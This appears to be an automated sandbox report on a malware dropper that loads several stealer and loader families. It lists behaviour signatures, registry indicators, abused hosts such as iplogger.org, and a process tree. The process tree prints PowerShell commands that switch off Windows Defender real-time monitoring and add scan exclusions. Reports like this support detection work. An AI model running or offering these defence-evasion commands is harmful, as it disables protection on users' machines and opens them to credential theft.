Analysis Overview
SHA256
3195334294fd75b18e9c0bc593335290b73dcc315d5c25157f2a3225eb595bad
Threat Level: Known bad
The file 2cb613560f21a4d9464b525743d579ba was found to be: Known bad.
Malicious Activity Summary
Glupteba
Redline family
NullMixer
Nullmixer family
Windows security bypass
Fabookie family
Raccoon family
RedLine payload
Vidar
Raccoon
Socelars payload
Vidar family
Privateloader family
Raccoon Stealer V1 payload
Detect Fabookie payload
Socelars family
RedLine
Glupteba payload
PrivateLoader
Fabookie
Socelars
Glupteba family
Vidar Stealer
Modifies boot configuration data using bcdedit
Identifies VirtualBox via ACPI registry values (likely anti-VM)
NirSoft WebBrowserPassView
Detected Nirsoft tools
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Command and Scripting Interpreter: PowerShell
ASPack v2.12-2.42
Windows security modification
Reads user/profile data of web browsers
Checks BIOS information in registry
System Binary Proxy Execution: Odbcconf
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Manipulates WinMonFS driver
Drops Chrome extension
Checks whether UAC is enabled
Adds Run key to start application
Looks up geolocation information via web service
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Program crash
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Checks SCSI registry key(s)
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Modifies system certificate store
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-08 10:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 10:35
Reported
2024-11-08 10:38
Platform
win7-20240903-en
Max time kernel
35s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2056 set thread context of 1628 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun154ca5fada.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-H5F1P.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15372e8db79ed3d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-5C9NP.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15635943177.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun15a8461882.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3B5581B1-9DBD-11EF-A059-6E295C7D81A3} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1524d92394d.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1500b8e65c1f53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe
"C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS43878AC6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
